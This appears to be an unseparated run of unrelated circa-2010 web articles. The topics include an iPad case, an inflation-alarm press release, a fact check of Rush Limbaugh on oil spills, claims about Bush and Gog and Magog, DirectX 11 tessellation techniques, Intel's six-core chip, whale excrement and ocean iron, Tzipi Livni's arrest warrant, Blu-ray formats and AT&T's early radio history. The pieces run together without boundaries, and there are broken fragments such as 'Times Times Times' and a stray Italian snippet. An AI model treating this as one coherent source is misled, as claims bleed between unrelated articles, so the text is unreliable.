Racked is no longer publishing .
Thank you to everyone who read our work over the years .
The archives will remain available here ; for new stories , head over to Vox.com , where our staff is covering consumer culture for The Goods by Vox .
You can also see what we ’re up to by signing up here .
This is both the best and worst Apple iPad case we 've ever seen .
On the one hand , it 's got novelty working for it , like the manila folder cases for the Macbook Air , but on the other hand we 'd never want to be seen in public toting it .
The iMaxi iPad case seems more at home on the set of Attack of the 50 - Foot Woman than tucked neatly away inside your messenger bag , but the item ? priced between $ 30 and $ 40 and even available with a red lining ?
is doing swift sales since the iPad became available over the weekend .
You can rest assured that Apple stores wo n't be carrying it anytime soon , but still , we 're curious : would you stash your iPad in an iMaxi ?
· iMaxi by Hip Handmaids [ Etsy ]
· iMaxi Case will keep your iPad clean and dry [ iPhone Savior ]
FORT LEE , N.J. , April 22 / PRNewswire / --
The National Inflation Association today issued the following food inflation alert to its http://inflation.us members :
The Bureau of Labor Statistics ( BLS ) today released their Producer Price Index ( PPI ) report for March 2010 and the latest numbers are shocking .
Food prices for the month rose by 2.4 % , its sixth consecutive monthly increase and the largest jump in over 26 years .
NIA believes that a major breakout in food inflation could be imminent , similar to what is currently being experienced in India .
Some of the startling food price increases on a year - over - year basis include , fresh and dry vegetables up 56.1 % , fresh fruits and melons up 28.8 % , eggs for fresh use up 33.6 % , pork up 19.1 % , beef and veal up 10.7 % and dairy products up 9.7 % .
On October 30th , 2009 , NIA predicted that inflation would appear next in food and agriculture , but we never anticipated that it would spiral so far out of control this quickly .
The PPI foreshadows price increases that will later occur in the retail sector .
With U - 6 unemployment rising last month to 16.9 % , many retailers are currently reluctant to pass along rising prices to consumers , but they will soon be forced to do so if they want to avoid reporting huge losses to shareholders .
Food stamp usage in the U.S. has now increased for 14 consecutive months .
There are now 39.4 million Americans on food stamps , up 22.4 % from one year ago .
The U.S. government is now paying out more to Americans in benefits than it collects in taxes .
As food inflation continues to surge , our country will soon have no choice but to cut back on food stamps and other entitlement programs .
Most financial experts in the mainstream media are proclaiming that the recession is over and inflation is not a problem in the U.S.
Unfortunately , they fail to realize that rising food and gasoline prices accounted for 58 % of February 's year - over - year 3.85 % rise in retail sales .
NIA believes price inflation is beginning to accelerate in many areas of the economy besides food and energy , and all increases in U.S. retail sales this year will be entirely due to inflation .
To receive NIA 's latest updates about inflation and the economy , sign - up for the free NIA newsletter at : http://inflation.us
About us :
The National Inflation Association is an organization that is dedicated to preparing Americans for hyperinflation .
The NIA offers free membership at http://www.inflation.us and provides its members with articles about the economy and inflation , news stories , important charts not shown by the mainstream media ; YouTube videos featuring Jim Rogers , Marc Faber , Ron Paul , Peter Schiff , and others ; and profiles of gold , silver , and agriculture companies that we believe could prosper in an inflationary environment .
CONTACT : Gerard Adams , 1-888-99 -NIA US ( 1888-996-4287 ) , [ email protected ]
SOURCE National Inflation Association
The Now That ’s Nifty blog reports on photo tarpaulins from the German company Style Your Garage .
These tarps are giant flexible photos designed for “ up - and - over ” garage doors , and they attach with Velcro .
They have a variety of themes ranging from vehicles to landscapes to animals and more .
Some of my favorites are the jet plane
Italy
and , for those with double garage doors , the dump truck .
If you do n’t want to do your garage door , the company also has similar products for standard doors and windows .
Prices are $ 225 for the single - door garage versions , and $ 439 and up for the double - door and triple - door garage versions .
The single - door “ motif of the week ” is $ 185 .
Style - Your - Garage [ Manufacturer ’s Site ]
With 200,000 gallons of oil a day spewing from an exploded oil rig in the Gulf of Mexico , forming a slick the size of West Virginia and threatening the coastline of Louisiana , radio pundit Rush Limbaugh said there 's no need to panic , that " the ocean will take care of this on its own if it was left alone and was left out there .
It 's natural . "
And to prove his point , Limbaugh pointed to the restoration of Alaska 's Prince William Sound , which was devastated by an oil spill from the Exxon Valdez 21 years ago .
" They were wiping off the rocks with Dawn dishwater detergent and paper towels and so forth , " Limbaugh said on his April 29 , 2010 , radio show .
" The place is pristine now . "
Government officials involved in the cleanup say the conditions are long way from being pristine , which is defined as " completely free from dirt or contamination . "
Despite the beautiful scenery and wildlife in full view in Prince William Sound , a report from the Exxon Valdez Oil Spill Trustee Council released last year on the 20th anniversary of the spill stated , " one of the most stunning revelations of Trustee Council - funded monitoring over the last 10 years is that Exxon Valdez oil persists in the environment and in places , is nearly as toxic as it was the first few weeks after the spill . "
The Trustee Council , formed by the Alaska government to oversee the restoration of the injured ecosystem , concluded the oil is decreasing at a rate of 0 to 4 percent a year , and " at this rate , the remaining oil will take decades and possibly centuries to disappear entirely . "
We asked Craig Tillery , deputy attorney general for the state of Alaska , about Limbaugh 's comment .
Tillery , a who has served as counsel to the Exxon Valdez Oil Spill Trustee Council , said it depends on how you define pristine .
" The vast majority of oil that landed in Alaska is gone , " he said .
But the government dug hundreds of test holes and found pockets of " still fresh - looking oil that is still toxic to the marine environment . "
In all , they estimated 23,000 gallons ( of the 11 million gallons spilled by the Exxon Valdez ) remains in isolated pockets of some beaches .
" It 's buried , you would n't see it , " said Tillery .
" It looks pristine , but it 's not pristine if your definition is that there 's no oil left . "
And that oil is still getting into the environment , he said .
Sea ducks and sea otters are still exhibiting signs of exposure to oil , he said .
And animals such as sea otters , which dig for clams , have released some of the oil trapped under the ground .
Most of the wildlife has recovered from the spill , Tillery said , but you also need to consider what you do n't see .
" You do n't see as many killer whales as you did before the spill , " he said .
" You do n't see herrings in the numbers you did before the spill .
On the surface , you 'd probably say this looks pretty pristine .
Underlying that , though , there is still evidence of the spill . "
" There are beaches where you can turn a shovel and still find oil , " said Stan Jones , director of external affairs for the Prince William Sound Regional Citizens Advisory Council .
Prince William sound has " mostly recovered visually , " Jones said , but to call it pristine is an " overstatement . "
Dr. Jeffrey Short , who was the leading chemist for the governments of Alaska and the United States following the 1989 Exxon Valdez oil spill , led a series of studies on the unexpected persistence of the oil .
In a Q & A with the environmental group Oceana , with whom he is now employed , Short stated , " We found that it ( oil ) lasted a lot longer than we thought in some locations and it was much better preserved than we thought it would be .
In some places the oil had n't degraded much beyond the first couple months after it had spilled . "
We asked Short about Limbaugh 's comment and he said that while it 's fair to say most of Prince William Sound has recovered from the impact of the Exxon Valdez , " there are some places where the oil continues to linger . "
In fact , the Exxon Valdez Oil Spill Trustee Council has a link on its website to its " Report on Recent Lingering Oil Studies . "
" At the time of the spill , most scientists believed that , within a few years , the process of weathering would either break down and decompose the oil , or would cause it to turn into a form of asphalt that would have little potential to release toxic components into the environment , " the report states .
" Contrary to these expectations , oil persists at some sites in Prince William Sound and the Gulf of Alaska in a relatively unweathered and potentially toxic condition . "
" Organisms that use the intertidal were severely affected by the spill and continued to show adverse effects from exposure to oil for many years after the spill .
These effects manifested themselves in reduced survival rates and diminished populations .
In recent years , however , there is evidence of improvement .
The extent of oil exposure appears to be diminishing in most species , and there is evidence that the populations of some species are beginning to increase . "
That sounds encouraging .
But it does n't change the fact that , despite outward appearance , 21 years after the Exxon Valdez spill , Prince William Sound is not pristine .
You may not be able to see it , but scientists and anyone willing to turn over rocks with a shovel attest to the fact that thousands of gallons of oil remain buried in some beaches , and the oil continues to adversely affect the environment .
We rule Limbaugh 's statement False .
The Burning Bush : George Bush told Jacques Chirac that Iraq must be invaded to thwart Gog and Magog
I had not heard this one , but trust me , it ’s a fuckin’ doozy …
Reposting the entire article here , via Secular Humanism :
A French Revelation , or The Burning Bush by James A. Haught
Incredibly , President George W. Bush told French President Jacques Chirac in early 2003 that Iraq must be invaded to thwart Gog and Magog , the Bible ’s satanic agents of the Apocalypse .
Honest .
This is n’t a joke .
The president of the United States , in a top - secret phone call to a major European ally , asked for French troops to join American soldiers in attacking Iraq as a mission from God .
Now out of office , Chirac recounts that the American leader appealed to their “ common faith ” ( Christianity ) and told him : “ Gog and Magog are at work in the Middle East … .
The biblical prophecies are being fulfilled ….
This confrontation is willed by God , who wants to use this conflict to erase his people ’s enemies before a New Age begins . ”
This bizarre episode occurred while the White House was assembling its “ coalition of the willing ” to unleash the Iraq invasion .
Chirac says he was boggled by Bush ’s call and “ wondered how someone could be so superficial and fanatical in their beliefs . ”
After the 2003 call , the puzzled French leader did n’t comply with Bush ’s request .
Instead , his staff asked Thomas Romer , a theologian at the University of Lausanne , to analyze the weird appeal .
Dr. Romer explained that the Old Testament book of Ezekiel contains two chapters ( 38 and 39 ) in which God rages against Gog and Magog , sinister and mysterious forces menacing Israel .
Jehovah vows to smite them savagely , to “ turn thee back , and put hooks into thy jaws , ” and slaughter them ruthlessly .
In the New Testament , the mystical book of Revelation envisions Gog and Magog gathering nations for battle , “ and fire came down from God out of heaven , and devoured them . ”
In 2007 , Dr. Romer recounted Bush ’s strange behavior in Lausanne University ’s review , Allez Savoir .
A French - language Swiss newspaper , Le Matin Dimanche , printed a sarcastic account titled : “ When President George W. Bush Saw the Prophesies of the Bible Coming to Pass . ” France ’s La Liberte likewise spoofed it under the headline “ A Small Scoop on Bush , Chirac , God , Gog and Magog . ”
But other news media missed the amazing report .
Subsequently , ex-President Chirac confirmed the nutty event in a long interview with French journalist Jean - Claude Maurice , who tells the tale in his new book , Si Vous le Répétez , Je Démentirai ( If You Repeat it , I Will Deny ) , released in March by the publisher Plon .
Oddly , mainstream media are ignoring this alarming revelation that Bush may have been half - cracked when he started his Iraq war .
My own paper , The Charleston Gazette in West Virginia , is the only U.S. newspaper to report it so far .
Canada ’s Toronto
Star recounted the story , calling it a “ stranger - than - fiction disclosure … which suggests that apocalyptic fervor may have held sway within the walls of the White House . ”
Fortunately , online commentary sites are spreading the news , filling the press void .
The French revelation jibes with other known aspects of Bush ’s renowned evangelical certitude .
For example , a few months after his phone call to Chirac , Bush attended a 2003 summit in Egypt .
The Palestinian foreign minister later said the American president told him he was “ on a mission from God ” to defeat Iraq .
At that time , the White House called this claim “ absurd . ”
Recently , GQ magazine revealed that former Defense Secretary Donald Rumsfeld attached warlike Bible verses and Iraq battle photos to war reports he hand - delivered to Bush .
One declared : “ Put on the full armor of God , so that when the day of evil comes , you may be able to stand your ground . ”
It ’s awkward to say openly , but now - departed President Bush is a religious crackpot , an ex-drunk of small intellect who “ got saved . ”
He never should have been entrusted with the power to start wars .
For six years , Americans really have n’t known why he launched the unnecessary Iraq attack .
Official pretexts turned out to be baseless .
Iraq had no weapons of mass destruction after all , and was n’t in league with terrorists , as the White House alleged .
Collapse of his asserted reasons led to speculation about hidden motives :
Was the invasion loosed to gain control of Iraq ’s oil — or to protect Israel — or to complete Bush ’s father ’s vendetta against the late dictator Saddam Hussein ?
Nobody ever found an answer .
Now , added to the other suspicions , comes the goofy possibility that abstruse , supernatural , idiotic , laughable Bible prophecies were a factor .
This casts an ominous pall over the needless war that has killed more than four thousand young Americans and cost U.S. taxpayers perhaps $ 1 trillion .
James A. Haught is the editor of the Charleston Gazette ( West Virginia ) and a Free Inquiry senior editor .
As you may have heard , Direct X 11 brings tessellation support , and all the hardware vendors and benchmarks are going crazy with super - finely tessellated meshes , promising us automatic level of detail and unprecedented visual fidelity .
What you may not be aware of is that the Xbox 360 has very similar tessellation hardware too , which means many game developers have had the opportunity to use these same techniques for about five years now .
So why are n’t all console games using tessellation pervasively ?
That ’s what I will tell you in this blog post , as well as demonstrate a solution to the problem .
The clue is present in just about any of the dozens of tessellation demos that are now available .
In case you have n’t seen one , here ’s a capture I just took of one of the samples in DirectX 11 ( ignore the frame rate , the capturing software interferes ) .
This looks good and all , but notice the mesh density .
Even when not doing any tessellation at all this is a 50 ×50 grid !
That ’s five thousand triangles at the lowest level of detail for roughly one square metre of cobblestone .
That ’s plainly a ridiculous poly - count for any practical purposes in games .
There are two main problems with such a high vertex density : it wastes time processing more vertices than needed , and leads to the small triangle problem .
It ’s wasteful because even at a modest distance you ’re not going to need 5000 triangles to represent a square metre of ground , so transforming that many vertices is just throwing precious cycles away .
The small triangle problem refers to the efficiency loss when rendering small triangles .
Current GPUs rasterize pixels in small groups of at least 2 ×2 pixels .
Whenever a triangle covers the entire “ quad ” of 2 × 2 pixels all is well , if however some of those pixels are not covered then the GPU resources associated with the unused pixels are just squandered .
For example , if each triangle only covers a single pixel , then every one of those quads will be 3/ 4 unused , leading to just 25 % pixel shading efficiency .
The problem
So why are all these demos using control meshes that are already finely tessellated ?
It ’s no accident .
There are two main reasons for this .
The first is that you can only specify tessellation factors on a per-edge level , so if you want to adaptively tessellate some areas more than others , you ’re going to have to have a dense distribution of edges to support that variation across the surface .
The bigger reason , though , is that smoothly varying tessellation on a displaced surface looks like rubbish at lower tessellation levels .
See this example , which is just the previous demo with a more reasonable base mesh resolution ( 4×4 , instead of 50×50 ) .
Notice the shimmering , bucking , artefact as the tessellation slider is moved up and down .
This is the dirty little secret that Xbox 360 developers have known for years : at reasonable mesh densities , continuous tessellation just looks awful and is unusable as a general strategy .
We used it in Banjo Kazooie : Nuts & Bolts for water , because the shimmering artefact actually looked pretty decent on a water surface that was supposed to shimmer , but while we tried to use it on some other things we could never live with the artefacts ( the solution below is something that came to me after BKNB shipped , and could in principle be implemented in a future title ) .
A solution
So what ’s going on here ?
Well the problem is that as vertices get added and removed they smoothly travel to their final location by sliding across the surface , this lead to vertices rapidly bobbing up and down as they move over the surface and sample different displacements from the displacement map .
This problem is not a new artefact , it ’s actually just standard minification aliasing .
When you do normal straight texture mapping , the texels are sampled at pixel locations .
If the ratio of texel density to pixel density gets too high you get minification aliasing because each pixel “ does n’t know ” which of the many texels it covers to sample from , so small changes in pixel position will lead to entirely different texels being used .
For regular texture mapping we solve this by using MIP - mapping .
Effectively just choosing a lower resolution version of the texture when the sample locations are too sparsely distributed to accurately reconstruct the full resolution texture .
Displacement mapping is no different .
Instead of sampling at pixels we have vertices , and instead of colours the values sampled are geometric offsets so the aliasing artefacts manifest in a different way .
The basic problem , though , is that we ’re reading a high frequency texture ( the displacement map ) at too low of a sampling frequency .
The solution to this problem is the same as for regular texture mapping – use MIP - mapping to choose a lower resolution texture when the sampling frequency ( i.e. tessellation factor ) is lower .
So how do we determine which LOD to use ?
Well , one simple way is to look at the length of each edge in the control mesh in texture space , and choose a MIP level for each edge so that the distance in texels for each subdivision will be no more than 0.5 texels ( this is to get us under the Nyquist limit which says that the sampling frequency must be twice that of the signal frequency ) .
In other words , if the length of the edge in pixels is L , and the edge ’s tessellation factor is T , then we will get L/T pixels per subdivision .
We want that to be 0.5 by choosing a MIP level , so we have to choose a MIP level M so that ( L/ T ) * 2 ^ ( - M ) = 0.5 ( the linear distance in texture space decreases by a factor of two for each MIP level ) .
Solve for M and we get : M = log2 ( L/T ) +
1 . In practice , linear interpolation is n’t a perfect reconstruction filter , so we may need a small fudge factor to boost the MIP level up slightly further .
Note that although we use MIP mapping , the MIP level used does n’t depend on viewing distance or angle , just on the tessellation factor ( which in turn may depend on those factors , of course ) .
So , now that we have a MIP level per edge , we can simply interpolate between them in the Domain Shader to pick a suitable MIP level for each verex .
It ’s important that the interpolation you use has the property that when the point is on an edge , the weights for the two other edges are zero , so that edge - vertices use the same MIP level regardless of which patch they belong to .
Here ’s how this looks :
We can see the basic idea working here .
Rather than shimmering artefacts when the tessellation level is too low to adequately represent the displacement , we just get a flatter surface instead ( due to choosing a lower - res MIP level of the displacement map ) .
However , it should be obvious that there ’s a problem here if you look closely at the “ spikes ” visible at each vertex in the base mesh .
Each one of those lies on two edges per patch , so wo n’t know from which to retrieve a MIP level .
So what do we do ?
Just pick one of the two candidate edges at random ?
Take the average ?
No , neither will work work because neighbouring patches can have entirely different edges using the vertex .
In fact , there can be an arbitrary number of patches associated with a vertex , and for each of them that vertex must pick the exact same MIP level in order to avoid cracks .
So what do we do for the control vertices themselves ?
Ideally , we ’d find the average MIP level for all the edges used by a vertex , but that would be expensive since tessellation factors ( and therefore MIP levels ) can change each frame .
The simplest solution I can think of is to store a “ preferred edge ” index for each control vertex .
This would simply be a randomly chosen edge that uses that vertex .
When you detect that you ’re on a control point ( by checking the barycentric coordinates ) , you simply check the vertex ’s preferred edge index , and fetch the MIP level associated with that edge .
Note that the preferred edge is not necessarily in the same patch as the current patch , but it is consistent in that every patch using that vertex will use the same preferred edge , and therefore MIP level , which eliminates cracks .
Here ’s how this looks :
This is much better .
We ’ve got rid of most of the aliasing , and the corners fall in line with a MIP level chosen from its immediate neighbourhood .
Notice that there ’s still some ever - so - subtle shimmering going on in the creases here .
That ’s because we ’re approximating the MIP level based on the coarse control mesh , whereas in reality the actual triangles in the tessellated mesh vary in size and shape .
The main downside to this strategy is that we need to compute edge tessellation and MIP levels outside the main draw calls to produce a buffer of per-edge tessellation factors and MIP levels , which not only adds a draw call and associated bandwidth increases , but also requires us to transform all of our control vertices several times ( assuming the tessellation factor depends on viewing direction , skinning etc. ) .
It would be ideal if the domain shader would give you some information about adjacent patches , so that we could easily compute an average LOD for all the edges connected to a vertex .
Other solutions
There are a couple of other potential solutions to this problem , so I ’m not trying to say that tessellation and displacement mapping is doomed or anything , I ’m just trying to temper some of the wild enthusiasm by pointing out that the claims of “ automatic LOD ” etc. are vastly overstated .
For example , this could clearly be combined with a standard LOD system , where only the high - res mesh uses tessellation .
Although at that point it ’s unclear whether it ’s even worth the effort .
Just let the high res model be really high - res instead .
Another option is to use fixed - step tessellation factors , instead of the continuous ones .
This causes harsher transitions between levels of details , but at least you do n’t have vertices sliding across the surface causing the disturbing shimmering demonstrated above .
But then again , if you ’re going to use discrete tessellation levels then simply using a normal LOD system is likely to be faster , and will definitely be a lot simpler .
Using power - of - two tessellation is promising .
In this mode vertices are added in a “ power of two ” fashion by subdividing each edge .
This is attractive because the tessellation pattern is simple enough that you could do geo- morphing by computing , in the domain shader , the previous height for the current point and the actual displaced height and then interpolating between them .
The downside with this is that in order to compute the previous height you have to somehow figure out where the current point lies on the surface of the mesh tessellated at a lower level .
This means you ’re effectively duplicating the effort of the fixed function tessellator in the domain shader , which does n’t sit right with me .
Conclusion
Generating geometry by sampling a texture at varying frequencies is not a trivial problem , and requires careful consideration in order to avoid the same aliasing problems that we ’ve already dealt with for regular texture mapping .
Unlike regular texture mapping , however , we do n’t have any real help from the hardware in figuring out the appropriate MIP level for a displacement map , so we have to figure out approximations ourselves , and while there are workable solutions , I have n’t been able to figure anything out that is n’t ugly or inefficient in some way .
I do hope that future talks about and demos of tessellation and displacement mapping will at least acknowledge this problem , instead of just ramping up the base mesh ’s polycount , sweeping the issue under the carpet .
Update
A simple variation of this idea which has the benefit of being very cheap is to compute a per-object representative MIP level on the CPU ( in some approximate way ) , and then in the domain shader simply interpolate between the MIP level you got from the edges , and this per -object MIP level , based on how close you are to a hull vertex ( e.g. use the maximum value of your barycentric coordinates ) .
You ’d probably want to ensure that only the vertices that are very close to the hull vertices get influenced by the per-object MIP level , but this would at least ensure that all hull vertices use exactly the same MIP level ( the per- object one ! ) while keeping the surface looking smooth .
Update 2
Obvious - in - retrospect tweak to this technique : simply store the “ UV coverage ” of each control vertex ( basically the average UV area for all the triangles touching it divided by 3 ) .
If you know the area in UV - space for a vertex , you can compute an appropriate MIP level for it that does not depend on the triangles it ’s used in .
In the domain shader , detect when you ’re at a control point and use the per-vertex MIP - level .
This is cheap , and better than a per- object MIP level .
This is looking like a pretty workable solution .
It ’s still not perfect because patches with a lot of internal variation has to be seriously over sampled to capture all the high frequencies .
Temperatures are set to plummet in coming years and Britain could face a new Little Ice Age
Weather patterns linked to the strength of the sun could bring much colder winters .
The last time Britain saw these conditions was from 1645 to 1715 when frost fairs were held on the frozen surface of the Thames in central London .
The period , called the Maunder minimum by scientists , became known as the Little Ice Age .
The climate phenomenon , which changes the direction of jet streams to bring bitter north - easterly winds from the Arctic and Russia , is called “ blocking ” .
It causes temperatures to drop by up to one degree celsius .
A report published today in Environmental Research Letters , said : “ Solar activity during the current sunspot minimum has fallen to levels unknown since the start of the 20th century .
“ Motivated by recent relatively cold winters in the UK , we investigated the possible connection with solar activity .
The results presented here indicate that , despite hemispheric warming , the UK and Europe could experience more cold winters than during recent decades . ”
A European online retailer has started selling Intel 's first six - core processor for desktops before the chip 's official release by the hardware giant .
A German retailer Alternate is selling the Intel Core i7-980 Extreme Edition processor , code - named " Gulftown , " for € 1.099 ( US $ 1,483 ) .
The chip is targeted at desktops used by enthusiasts like gamers .
The six - core processor will run at speeds up to 3.6GHz and include 12 MB of L3 cache , according to the Web site , which lists the details in German .
Each core will be able to run two threads , which means the processor will be able to run 12 core simultaneously for faster processing .
The processor will support DDR3 memory .
Intel did not immediately comment on the listing of the product or its official release date .
Intel until now has sold dual - core and quad - core chips for desktops .
Intel has sold six - core chips only for servers .
The six - core , Xeon 7400 series of chips , code - named Dunnington , were based on the Penryn architecture and originally released in 2008 .
The Gulftown chips bring speed and power enhancements over Intel 's existing chips for enthusiast desktops .
In addition to more cores , the processors will cut existing bottlenecks to enable faster data transfers .
The chips are made using the advanced 32 - nanometer process , which will reduce power leaks compared to earlier quad - core chips , which were made using the 45 - nm process .
The Gulftown chip could also be the first in a new wave of processors released by Intel made using the 32 - nm process .
The chip maker earlier this year launched the first 32 - nm process chips for mainstream desktops and laptops .
Pagina 1 di 6
Da intendersi come prosieguo delle precedenti recensione e videorecensione vere e proprie di Motorola Milestone - terminale Android multitouch , questo articolo vuole mostrarvi il comportamento dell ' unità in seguito all ' aggiornamento Android 2.1 .
Ecco guida e videorecensione !
Humpback whales ( C ) rise out of the water off the coast near Sydney in 2008 .
Experts from the Australian Antarctic Division have found that whale excrement -- much of which is derived from the huge mammals ' consumption of krill -- effectively places a plant - friendly fertilizer into ocean waters .
Australian scientists have discovered an unlikely element in the fight against climate change -- whale poo .
Experts from the Australian Antarctic Division have found that whale excrement -- much of which is derived from the huge mammals ' consumption of krill -- effectively places a plant - friendly fertilizer into ocean waters .
" When whales consume the iron - rich krill , they excrete most of the iron back into the water , therefore fertilising the ocean and starting the whole food cycle again , " scientist Steve Nicol said .
The research suggests that if whale numbers grow , their droppings could help marine plant life flourish , thereby improving the ocean 's ability to absorb carbon dioxide blamed for global warming .
Iron is a vital element in the production of marine plants , known as algae , which suck up carbon dioxide as they grow , although it is a scarce element in the " anaemic " Southern Ocean , said chemical oceanographer Andrew Bowie .
" One - third of the world 's oceans are low in trace element iron , " the researcher at the Antarctic Climate and Ecosystems Cooperative Research Centre told AFP .
Bowie said whales consumed several tonnes of krill , small shrimp - like crustaceans , each day and this found its way back into the ocean via liquid - form , reddish brown emissions from the giant mammals .
He said while the researchers were pretty confident that whale poo would contain iron , they were surprised at the high concentration , about 10 million times that of Antarctic seawater .
Explore further Major Antarctic study to begin next year
( c ) 2010 AFP
The Times
Times
Times
Times
Yaakov Katz , Herb Keinon and Ron Friedman contributed to this report .
The amending of current British law in order to ensure Israeli officials visiting the UK are not be arrested on charges of war crimes may be in jeopardy , reported on Monday .
The proposed change is apparently in danger due to a “ cabinet split ” regarding its timing .
Also , according to the report , Kadima head and opposition leader Tzipi Livni has suggested a willingness to “ take the bullet ” and face arrest in the UK on a future trip in order to force the British government into action .
She was quoted as saying , “ Britain has obligated itself to me personally that this subject will be taken care of .
” An arrest warrant was issued for Livni in December , 2009 , for her involvement in Operation Cast Lead in Gaza .
Back then , British Foreign Secretary David Miliband called Livni and Foreign Minister Avigdor Lieberman and , according to a statement put out by Livni 's office , expressed his " shock " at the arrest warrant and promised to work immediately to ensure that a similar occurrence would not happen in the future against Livni or other Israeli officials .
Miliband told Lieberman that the warrant was " completely unacceptable .
"
In his statement , Miliband said that " The procedure by which arrest warrants can be sought and issued without any prior knowledge or advice by a prosecutor is an unusual feature of the system in England and Wales .
The government is looking urgently at ways in which the UK system might be changed in order to avoid this sort of situation arising again .
” The arrest warrant was made possible because of a fairly unusual legal situation in Britain whereby any individual could go to court and ask for an arrest warrant against an alleged war criminal without the government having to know about it and , as a result , not having any say about whether it should be issued .
Within British offices there is a dispute as to how to go about changing the law .
Thereport cited British Justice Secretary Jack Straw as making private warnings against a quick change , suggesting the issue be explored by a committee .
A committee review would postpone any change until after parliamentary elections .
Thereported that another possible change is mandating the attorney - general , rather than a magistrate , authorize a warrant .
Thequoted Israeli Foreign Ministry spokesman Yigal Palmor as saying “ IfIsraeli dignitaries cannot travel unhindered to Britain , than they willnot travel .
Automatically the political dialogue between the twocountries will be reduced .
This is not something that London orJerusalem wants . ”
Show full PR text
Blu-ray Disc Association Announces Additional Format Enhancements
LOS ANGELES --( Business Wire ) -- Apr 03 , 2010 The Blu-ray Disc Association ( BDA ) today announced two new media specifications that use Blu-ray Disc technology to provide targeted functionality for commercial and consumer applications .
The specifications for BDXL ™ ( High Capacity Recordable and Rewritable discs ) and IH - BD ( Intra - Hybrid discs ) are expected in the next few months .
The BDXL specification , which is targeted primarily at commercial segments such as broadcasting , medical and document imaging enterprises with significant archiving needs , will provide customers with write - once options on 100GB and 128GB capacity discs and rewritable capability on 100 GB discs .
The discs reach these capacities by incorporating three to four recordable layers .
A consumer version of BDXL is also expected , particularly in those regions where BD recorders have achieved broad consumer acceptance .
" Professional industries have expressed a desire to find optical disc solutions that enable them to transition away from magnetic media for their archiving needs , " said Victor Matsuda , Blu-ray Disc Association Global Promotions Committee chair .
" Leveraging Blu-ray Disc to meet this need provides professional enterprises with a compact , stable and long term solution for archiving large amounts of sensitive data , video and graphic images using a proven and widely accepted optical technology . "
The Intra -Hybrid Blu-ray Disc ( IH - BD ) incorporates a single BD - ROM layer and a single BD - RE layer so as to enable the user to view , but not overwrite , critical published data while providing the flexibility to include relevant personal data on the same physical disc .
This allows for consumer specific applications where combining published content with related user data on a convenient , single volume is desirable .
Both the ROM and the RE layers on IH - BD discs provide 25 GB of capacity .
Because both BDXL and IH - BD are specially designed formats with specific market segments in mind , newly - designed hardware is required to play back or record BDXL or IH - BD media .
However , because the new media specifications are extensions of current Blu-ray Disc technology , future BDXL and IH - BD devices can be designed to support existing 25GB and 50 GB Blu-ray Discs .
About Blu-ray DiscTM
Blu-ray DiscTM is the next - generation optical disc format for high definition audio- video and high - capacity data software applications .
A single - layer Blu-ray Disc holds up to 25 gigabytes of data and a double - layer Blu-ray Disc holds up to 50 gigabytes of data .
About the Blu-ray Disc Association
The Blu-ray Disc Association ( BDA ) is responsible for promoting and developing business opportunities for Blu-ray Disc - the next - generation optical disc format for storing high - definition movies , games , photos and other digital content .
The BDA has more than 170 members .
Its Board of Directors consists of individuals affiliated with the following member companies : Apple Inc. , Dell Inc. , Hewlett - Packard Company , Hitachi , Ltd. , Intel Corporation , LG Electronics Inc. , Mitsubishi Electric Corporation , Oracle Corporation , Panasonic Corporation , Pioneer Corporation , Royal Philips Electronics , Samsung Electronics Co. , Ltd. , Sharp Corporation , Sony Corporation , TDK Corporation , Technicolor , Twentieth Century Fox , Walt Disney Pictures and Television , and Warner Bros. Entertainment Inc .
The Blu-ray DiscTM name and Blu-ray DiscTM logo are registered trademarks of the Blu-ray Disc Association .
BDXL™ is a trademark of the Blu-ray Disc Association .
This just in : Ars Technica has uncovered a campaign by AT&T to completely dominate the nation 's system of broadcasting .
The telco 's plan would make it almost impossible for broadcast license holders not affiliated with the carrier to operate .
The plot involves an elaborate system of patent lawsuits , corporate alliances , and deals with local politicians .
Oh , sorry — before we get too far into this exclusive , we should probably add that the scheme was hatched in 1922 and abandoned by 1926 .
But if it 's not a breaking story , it 's still relevant history .
Right now the Federal Communications Commission is proposing a massive transfer of broadcast spectrum to the wireless industry , whose principals , AT&T included , are providing all of the services offered by television and radio broadcasters — with voice and Internet too .
This is all new to us because we take for granted the old over - the - air broadcast licensing system that we 've lived with for almost a century .
But nothing was old at the dawn of broadcast radio in the early 1920s .
Let 's go back to those days and explore an alternate history that never happened — until now .
Fictionalists
It was August 28 , 1922 , and radio station WEAF in New York City was airing a ten - minute talk by a representative of a real estate company praising the virtues of fine literature and suburban living .
" It is fifty - eight years since Nathaniel Hawthorne , the greatest of American fictionalists , passed away , " the executive began .
" To honor his memory , the Queensboro Corporation , creator and operator of the tenant - owned system of apartment homes at Jackson Heights , New York City , has named the latest group of high - grade dwellings ' Hawthorne Court ' . "
Many historians identify this highbrow little speech as the first radio commercial .
The station charged $ 50 for it , and another in the evening for $ 100 .
But what is less often highlighted is that the frequency in question was owned by AT&T , which , true to its telco spirit , did n't call the ad an ad , but a " toll - cast " presentation .
If Ma Bell wanted to get into broadcasting , so did everybody else , including hotels , restaurants , schools , community centers , Pentacostalist preachers , quack doctors , and electrical appliance factories .
And why not ?
There were no hard and fast rules yet about who could start a radio station , or what they could do with it .
But AT&T was in a particularly good position to dominate this field , because it had played a crucial role in the creation of the telecom sector after the First World War .
While millions of Americans were marching Over There , the United States Navy had taken over the nation 's telecommunications system over here — telephone , telegraph , and cable .
Not surprisingly , Navycrats wanted to keep control over wireless after the peace .
But government administration of railroad and telecom services had been terrible for consumers — driving up communications and transport prices .
That and massive censorship of the press during the war shut down any public support for this experiment .
So in 1919 Navy officials opted for their next best choice — driving out of town their rival for dominance over the airwaves , the hated Marconi Wireless Telegraph Company .
The administration of Woodrow Wilson petitioned General Electric not to sell Marconi the crucial new state - of - the - art alternators that would pave the way for broadcast radio in the 1920s .
Seeing the writing on the telegraph tape , British Marconi divested itself of its American holdings , and G.E. Vice President Owen Young became Chair of the Board of a new company : the Radio Corporation of America .
RCA 's mission was " to link the countries of the world in exchanging commercial messages , " declared its founding press release .
But RCA soon discovered that it had a rival .
Not only was AT&T slowly expanding its control over the nation 's telephone lines , but it owned key vacuum tube patent rights crucial to wireless reception .
So in July of 1920 , RCA and AT&T cut a deal .
The former would control ship - to - shore and oceanic telegraphy .
The latter would hold rights to land - based wireless and exclusive rights to " all land radio telephony for toll purposes . "
AT&T also owned RCA stock and had representation on the company 's board of directors .
But while these executives were hashing out the details that summer , they still thought the future was about wireless Morse code .
Four months later , however , a station in Pittsburgh , Pennsylvania named KDKA began voice and music transmission over the airwaves .
As the mania for " radio " spread across the country , both companies realized that they each held keys crucial to the nation 's media future .
Secretary of Agriculture Howard M. Gore .
February 26 , 1924 .
